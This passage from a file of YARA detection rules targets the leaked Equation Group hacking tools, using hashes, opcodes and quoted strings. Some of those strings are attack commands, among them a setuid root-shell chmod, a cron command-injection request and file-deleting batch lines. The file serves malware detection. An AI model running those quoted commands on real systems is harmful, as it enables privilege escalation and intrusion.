    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "614bf159b956f20d66cedf25af7503b41e91841c75707af0cdf4495084092a61"
  strings:
    $s1 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" ascii fullword
    $s2 = "0123456789abcdefABCEDF:" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and all of them)
}

rule EquationGroup_cursesleepy_mswin32_v_1_0_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "6293439b4b49e94f923c76e302f5fc437023c91e063e67877d22333f05a24352"
  strings:
    $s1 = "A}%j,R" ascii fullword
    $op1 = { A1 E0 43 41 00 8B 0D 34 44 41 00 6B C0 }
    $op2 = { 33 C0 F3 A6 74 14 8B 5D 08 8B 4B 34 50 }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 2 of them)
}

rule EquationGroup_porkserver_v3_0_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "7b5f86e289047dd673e8a09438d49ec43832b561bac39b95098f5bf4095b8b4a"
  strings:
    $s1 = "%s: %s rpcprog=%d, rpcvers = %d/%d, proto=%s, wait.max=%d.%d, user.group=%s.%s builtin=%lx server=%s" ascii fullword
    $s2 = "%s/%s server failing (looping), service terminated" ascii fullword
    $s3 = "getpwnam: %s: No such user" ascii fullword
    $s4 = "execv %s: %m" ascii fullword
    $s5 = "%s/%s: getsockname: %m" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 71680 and 4 of them)
}

rule EquationGroup_cursehelper_win2k_i686_v_2_2_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "5ac6fde8a06f4ade10d672e60e92ffbf78c4e8db6b5152e23171f6f53af0bfe1"
  strings:
    $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/{}" ascii fullword
    $op1 = { 8D B5 48 FF FF FF 89 34 24 E8 56 2A 00 00 C7 44 }
    $op2 = { E9 A2 F2 FF FF FF 85 B4 FE FF FF 8B 95 A8 FE FF }
  condition:
    (uint16(0) == 23117 and filesize < 512000 and all of them)
}

rule EquationGroup_morerats_client_addkey {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "6c67c03716d06a99f20c1044585d6bde7df43fee89f38915db0b03a42a3a9f4b"
  strings:
    $x1 = "print '  -s storebin  use storebin as the Store executable\\n'" ascii fullword
    $x2 = "os.system('%s --file=\"%s\" --wipe > /dev/null' % (storebin, b))" ascii fullword
    $x3 = "print '  -k keyfile   the key text file to inject'" ascii fullword
  condition:
    (filesize < 20480 and 1 of them)
}

rule EquationGroup_noclient_3_3_2 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72"
  strings:
    $x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" ascii fullword
    $x2 = "iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" ascii fullword
    $x3 = "noclient: failed to execute %s: %s" ascii fullword
    $x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" ascii fullword
    $s5 = "Attempting connection from 0.0.0.0:" ascii
  condition:
    (filesize < 1024000 and 1 of them)
}

rule EquationGroup_curseflower_mswin32_v_1_0_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "fdc452629ff7befe02adea3a135c3744d8585af890a4301b2a10a817e48c5cbf"
  strings:
    $s1 = "<pVt,<et(<st$<ct$<nt" ascii fullword
    $op1 = { 6A 04 83 C0 08 6A 01 50 E8 10 34 00 00 83 C4 10 }
  condition:
    (uint16(0) == 23117 and filesize < 307200 and all of them)
}

rule EquationGroup_tmpwatch {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "65ed8066a3a240ee2e7556da74933a9b25c5109ffad893c21a626ea1b686d7c1"
  strings:
    $s1 = "chown root:root /tmp/.scsi/dev/bin/gsh" ascii fullword
    $s2 = "chmod 4777 /tmp/.scsi/dev/bin/gsh" ascii fullword
  condition:
    (filesize < 1024 and 1 of them)
}

rule EquationGroup_orleans_stride_sunos5_9_v_2_4_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "6a30efb87b28e1a136a66c7708178c27d63a4a76c9c839b2fc43853158cb55ff"
  strings:
    $s1 = "_lib_version" ascii fullword
    $s2 = ",%02d%03d" ascii fullword
    $s3 = "TRANSIT" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 204800 and all of them)
}

rule EquationGroup_morerats_client_noprep {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "a5b191a8ede8297c5bba790ef95201c516d64e2898efaeb44183f8fdfad578bb"
  strings:
    $x1 = "storestr = 'echo -n \"%s\" | Store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, VAR_NAME)" ascii fullword
    $x2 = "The NOPEN-args provided are injected into infile if it is a valid" ascii fullword
    $x3 = " -i                do not autokill after 5 hours" ascii fullword
  condition:
    (filesize < 9216 and 1 of them)
}

rule EquationGroup_cursezinger_linuxrh7_3_v_2_0_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "af7c7d03f59460fa60c48764201e18f3bd3f72441fd2e2ff6a562291134d2135"
  strings:
    $s1 = ",%02d%03d" ascii fullword
    $s2 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" ascii fullword
    $s3 = "__strtoll_internal" ascii fullword
    $s4 = "__strtoul_internal" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 409600 and all of them)
}

rule EquationGroup_seconddate_ImplantStandalone_3_0_3 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "d687aa644095c81b53a69c206eb8d6bdfe429d7adc2a57d87baf8ff8d4233511"
  strings:
    $s1 = "EFDGHIJKLMNOPQRSUT" ascii fullword
    $s2 = "G8HcJ HcF LcF0LcN" ascii fullword
    $s3 = "GhHcJ0HcF@LcF0LcN8H" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 1024000 and all of them)
}

rule EquationGroup_watcher_solaris_i386_v_3_3_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "395ec2531970950ffafde234dded0cce0c95f1f9a22763d1d04caa060a5222bb"
  strings:
    $s1 = "getexecname" ascii fullword
    $s2 = "invalid option `" ascii fullword
    $s6 = "__fpstart" ascii fullword
    $s12 = "GHFIJKLMNOPQRSTUVXW" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 716800 and all of them)
}

rule EquationGroup_gr_dev_bin_now {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "f5ed8312fc6e624b04e1e2d6614f3c651c9e9902ff41f4d069c32caca0869fa4"
  strings:
    $x1 = "HTTP_REFERER=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"" ascii fullword
    $x2 = "exec /usr/share/redmin/cgi/redmin" ascii fullword
  condition:
    (filesize < 1024 and 1 of them)
}

rule EquationGroup_gr_dev_bin_post {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "c1546155efa95dbc4e3cc95299a3968fc075f89d33164e78b00b76c7d08a0591"
  strings:
    $x1 = "op=cron&action=once&frame=cronOnceFrame&cronK=cronV&cronCommand=%2Ftmp%2Ftmpwatch&time=12%3A12+01%2F28%2F2005" ascii
  condition:
    (filesize < 1024 and all of them)
}

rule EquationGroup_curseyo_win2k_v_1_0_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "5dc77614764b23a38610fdd8abe5b2274222f206889e4b0974a3fea569055ed6"
  strings:
    $s1 = "0123456789abcdefABCEDF:" ascii fullword
    $op0 = { C6 06 5B 8B BD 70 FF FF FF 8B 9D 64 FF FF FF 0F }
    $op1 = { 55 B8 FF FF FF FF 89 E5 83 EC 28 89 7D FC 8B 7D }
    $op2 = { FF 05 10 64 41 00 89 34 24 E8 DF 1E 00 00 E9 31 }
  condition:
    (uint16(0) == 23117 and filesize < 204800 and all of them)
}

rule EquationGroup_gr {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "d3cd725affd31fa7f0e2595f4d76b09629918612ef0d0307bb85ade1c3985262"
  strings:
    $s1 = "if [ -f /tmp/tmpwatch ] ; then" ascii fullword
    $s2 = "echo \"bailing. try a different name\"" ascii fullword
  condition:
    (filesize < 1024 and all of them)
}

rule EquationGroup_curseroot_win2k_v_2_1_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "a1637948ed6ebbd2e582eb99df0c06b27a77c01ad1779b3d84c65953ca2cb603"
  strings:
    $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" ascii fullword
    $op0 = { C7 44 24 04 FF FF FF FF 89 04 24 E8 46 65 01 00 }
    $op1 = { 8D 5D 88 89 1C 24 E8 24 1B 01 00 BE FF FF FF FF }
    $op2 = { D3 E0 48 E9 0C FF FF FF 8B 45 }
  condition:
    (uint16(0) == 23117 and filesize < 409600 and $s1 and 2 of ($op*))
}

rule EquationGroup_cursewham_curserazor_cursezinger_curseroot_win2k {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "aff27115ac705859871ab1bf14137322d1722f63705d6aeada43d18966843225"
    hash2 = "7a25e26950bac51ca8d37cec945eb9c38a55fa9a53bc96da53b74378fb10b67e"
  strings:
    $s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" ascii fullword
    $s3 = ",%02d%03d" ascii fullword
    $s4 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" ascii fullword
    $op1 = { 7D EC 8D 74 3F 01 0F AF F7 C1 C6 05 }
    $op2 = { 29 F1 89 FB D3 EB 89 F1 D3 E7 }
    $op3 = { 7D E4 8D 5C 3F 01 0F AF DF C1 C3 05 }
  condition:
    (uint16(0) == 23117 and filesize < 409600 and 3 of them)
}

rule EquationGroup_watcher_linux_i386_v_3_3_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "ce4c9bfa25b8aad8ea68cc275187a894dec5d79e8c0b2f2f3ec4184dc5f402b8"
  strings:
    $s1 = "invalid option `" ascii fullword
    $s8 = "readdir64" ascii fullword
    $s9 = "89:z89:%r%opw" wide fullword
    $s13 = "Ropopoprstuvwypypop" wide fullword
    $s17 = "Missing argument for `-x'." ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 716800 and all of them)
}

rule EquationGroup_charm_saver_win2k_v_2_0_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "0f7936a37482532a8ba5df4112643ed7579dd0e59181bfca9c641b9ba0a9912f"
  strings:
    $s2 = "0123456789abcdefABCEDF:" ascii fullword
    $op0 = { B8 FF FF FF FF 7F 65 EB 30 8B 55 0C 89 D7 0F B6 }
    $op2 = { BA FF FF FF FF 83 C4 6C 89 D0 5B 5E 5F 5D C3 90 }
  condition:
    (uint16(0) == 23117 and filesize < 409600 and all of them)
}

rule EquationGroup_cursehappy_win2k_v_6_1_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "eb669afd246a7ac4de79724abcce5bda38117b3138908b90cac58936520ea632"
  strings:
    $op1 = { E8 24 2C 01 00 85 C0 89 C6 BA FF FF FF FF 74 D6 }
    $op2 = { 89 4C 24 04 89 34 24 89 44 24 08 E8 CE 49 FF FF }
  condition:
    (uint16(0) == 23117 and filesize < 409600 and all of them)
}

rule EquationGroup_morerats_client_Store {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "619944358bc0e1faffd652b6af0600de055c5e7f1f1d91a8051ed9adf5a5b465"
  strings:
    $s1 = "[-] Failed to mmap file: %s" ascii fullword
    $s2 = "[-] can not NULL terminate input data" ascii fullword
    $s3 = "Missing argument for `-x'." ascii fullword
    $s4 = "[!] Value has size of 0!" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 61440 and 2 of them)
}

rule EquationGroup_watcher_linux_x86_64_v_3_3_0 {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    hash1 = "a8d65593f6296d6d06230bcede53b9152842f1eee56a2a72b0a88c4f463a09c3"
  strings:
    $s1 = "forceprismheader" ascii fullword
    $s2 = "invalid option `" ascii fullword
    $s3 = "forceprism" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 921600 and all of them)
}

rule EquationGroup_linux_exactchange {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    super_rule = 1
    hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
    hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
    hash3 = "39d4f83c7e64f5b89df9851bdba917cf73a3449920a6925b6cd379f2fdec2a8b"
    hash4 = "15e12c1c27304e4a68a268e392be4972f7c6edf3d4d387e5b7d2ed77a5b43c2c"
  strings:
    $x1 = "[+] looking for vulnerable socket" ascii fullword
    $x2 = "can't use 32-bit exploit on 64-bit target" ascii fullword
    $x3 = "[+] %s socket ready, exploiting..." ascii fullword
    $x4 = "[!] nothing looks vulnerable, trying everything" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 2048000 and 1 of them)
}

rule EquationGroup_x86_linux_exactchange {
  meta:
    description = "Equation Group hack tool set"
    author = "Florian Roth"
    reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
    date = "2017-04-09"
    super_rule = 1
    hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
    hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
  strings:
    $x1 = "kernel has 4G/4G split, not exploitable" ascii fullword
    $x2 = "[+] kernel stack size is %d" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 1024000 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Eclipsedwing_Rpcproxy_Pcdlllauncher {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "48251fb89c510fb3efa14c4b5b546fbde918ed8bb25f041a801e3874bd4f60f8"
    hash2 = "237c22f4d43fdacfcbd6e1b5f1c71578279b7b06ea8e512b4b6b50f10e8ccf10"
    hash3 = "79a584c127ac6a5e96f02a9c5288043ceb7445de2840b608fc99b55cf86507ed"
  strings:
    $x1 = "[-] Failed to Prepare Payload!" ascii fullword
    $x2 = "ShellcodeStartOffset" ascii fullword
    $x3 = "[*] Waiting for AuthCode from exploit" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Explodingcantouch_1_2_1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "0cdde7472b077610d0068aa7e9035da89fe5d435549749707cae24495c8d8444"
  strings:
    $x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" ascii fullword
    $s2 = "[!]Warning: Error on first request - path size may actually be larger than indicated." ascii fullword
    $s4 = "<http://%s/%s> (Not <locktoken:write1>) <http://%s/>" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 153600 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Architouch_1_0_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
  strings:
    $s1 = "[+] Target is %s" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 307200 and all of them)
}

rule EquationGroup_Toolset_Apr17_Erraticgopher_1_0_1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052"
  strings:
    $x1 = "[-] Error appending shellcode buffer" ascii fullword
    $x2 = "[-] Shellcode is too big" ascii fullword
    $x3 = "[+] Exploit Payload Sent!" ascii fullword
    $x4 = "[+] Bound to Dimsvc, sending exploit request to opnum 29" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 153600 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Esteemaudit_2_1_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "61f98b12c52739647326e219a1cf99b5440ca56db3b6177ea9db4e3b853c6ea6"
  strings:
    $x1 = "[+] Connected to target %s:%d" ascii fullword
    $x2 = "[-] build_exploit_run_x64():" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Darkpulsar_1_1_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "b439ed18262aec387984184e86bfdb31ca501172b1c066398f8c56d128ba855a"
  strings:
    $x1 = "[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)" ascii fullword
    $x2 = "[%s] - Error building DLL loading shellcode" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and all of them)
}

rule EquationGroup_Toolset_Apr17_Educatedscholar_1_0_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d"
  strings:
    $x1 = "[+] Shellcode Callback %s:%d" ascii fullword
    $x2 = "[+] Exploiting Target" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 153600 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Doublepulsar_1_3_1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13"
  strings:
    $x1 = "[+] Ping returned Target architecture: %s - XOR Key: 0x%08X" ascii fullword
    $x2 = "[.] Sending shellcode to inject DLL" ascii fullword
    $x3 = "[-] Error setting ShellcodeFile name" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Erraticgophertouch_1_0_1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "729eacf20fe71bd74e57a6b829b45113c5d45003933118b53835779f0b049bad"
  strings:
    $x1 = "[-] Unable to connect to broswer named pipe, target is NOT vulnerable" ascii fullword
    $x2 = "[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable" ascii fullword
    $x3 = "[+] Bound to Dimsvc, target IS vulnerable" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 30720 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Smbtouch_1_1_1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
  strings:
    $x1 = "[+] Target is vulnerable to %d exploit%s" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and all of them)
}

rule EquationGroup_Toolset_Apr17_Educatedscholartouch_1_0_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "f4b958a0d3bb52cb34f18ea293d43fa301ceadb4a259d3503db912d0a9a1e4d8"
  strings:
    $x1 = "[!] A vulnerable target will not respond." ascii fullword
    $x2 = "[-] Target NOT Vulernable" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 30720 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Esteemaudittouch_2_1_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "f6b9caf503bb664b22c6d39c87620cc17bdb66cef4ccfa48c31f2a3ae13b4281"
  strings:
    $x1 = "[-] Touching the target failed!" ascii fullword
    $x2 = "[-] OS fingerprint not complete - 0x%08x!" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Rpctouch_2_1_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "7fe4c3cedfc98a3e994ca60579f91b8b88bf5ae8cf669baa0928508642c5a887"
  strings:
    $x1 = "[*] Failed to detect OS / Service Pack on %s:%d" ascii fullword
    $x2 = "[*] SMB String: %s (%s)" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 81920 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Mofconfig_1_0_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "c67a24fe2380331a101d27d6e69b82d968ccbae54a89a2629b6c135436d7bdb2"
  strings:
    $x1 = "[-] Get RemoteMOFTriggerPath error" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 51200 and all of them)
}

rule EquationGroup_Toolset_Apr17_Easypi_Explodingcan {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "dc1ddad7e8801b5e37748ec40531a105ba359654ffe8bdb069bd29fb0b5afd94"
    hash2 = "97af543cf1fb59d21ba5ec6cb2f88c8c79c835f19c8f659057d2f58c321a0ad4"
  strings:
    $x1 = "[-] %s - Target might not be in a usable state." ascii fullword
    $x2 = "[*] Exploiting Target" ascii fullword
    $x3 = "[-] Encoding Exploit Payload failed!" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 102400 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Eclipsedwingtouch_1_0_4 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "46da99d80fc3eae5d1d5ab2da02ed7e61416e1eafeb23f37b180c46e9eff8a1c"
  strings:
    $x1 = "[-] The target is NOT vulnerable" ascii fullword
    $x2 = "[+] The target IS VULNERABLE" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 51200 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Iistouch_1_2_2 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "c433507d393a8aa270576790acb3e995e22f4ded886eb9377116012e247a07c6"
  strings:
    $x1 = "[-] Are you being redirectect? Need to retarget?" ascii fullword
    $x2 = "[+] IIS Target OS: %s" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 61440 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Namedpipetouch_2_0_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "cb5849fcbc473c7df886828d225293ffbd8ee58e221d03b840fd212baeda6e89"
    hash2 = "043d1c9aae6be65f06ab6f0b923e173a96b536cf84e57bfd7eeb9034cd1df8ea"
  strings:
    $s1 = "[*] Summary: %d pipes found" ascii fullword
    $s3 = "[+] Testing %d pipes" ascii fullword
    $s6 = "[-] Error on SMB startup, aborting" ascii fullword
    $s12 = "92a761c29b946aa458876ff78375e0e28bc8acb0" ascii fullword
    $op1 = { 68 10 10 40 00 56 E8 E1 }
  condition:
    (uint16(0) == 23117 and filesize < 40960 and 2 of them)
}

rule EquationGroup_Toolset_Apr17_Easybee_1_0_1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "59c17d6cb564edd32c770cd56b5026e4797cf9169ff549735021053268b31611"
  strings:
    $x1 = "@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"" ascii fullword
    $x2 = "Logging out of WebAdmin (as target account)" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Regread_1_1_1 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
  strings:
    $s1 = "[+] Connected to the Registry Service" ascii fullword
    $s2 = "f08d49ac41d1023d9d462d58af51414daff95a6a" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 81920 and 1 of them)
}

rule EquationGroup_Toolset_Apr17_Englishmansdentist_1_2_0 {
  meta:
    description = "Detects EquationGroup Tool - April Leak"
    author = "Florian Roth"
    reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
    date = "2017-04-15"
    hash1 = "2a6ab28885ad7d5d64ac4c4fb8c619eca3b7fb3be883fc67c90f3ea9251f34c6"
  strings:
    $x1 = "[+] CheckCredentials(): Checking to see if valid username/password" ascii fullword
    $x2 = "Error connecting to target, TbMakeSocket() %s:%d." ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 204800 and 1 of them)
}

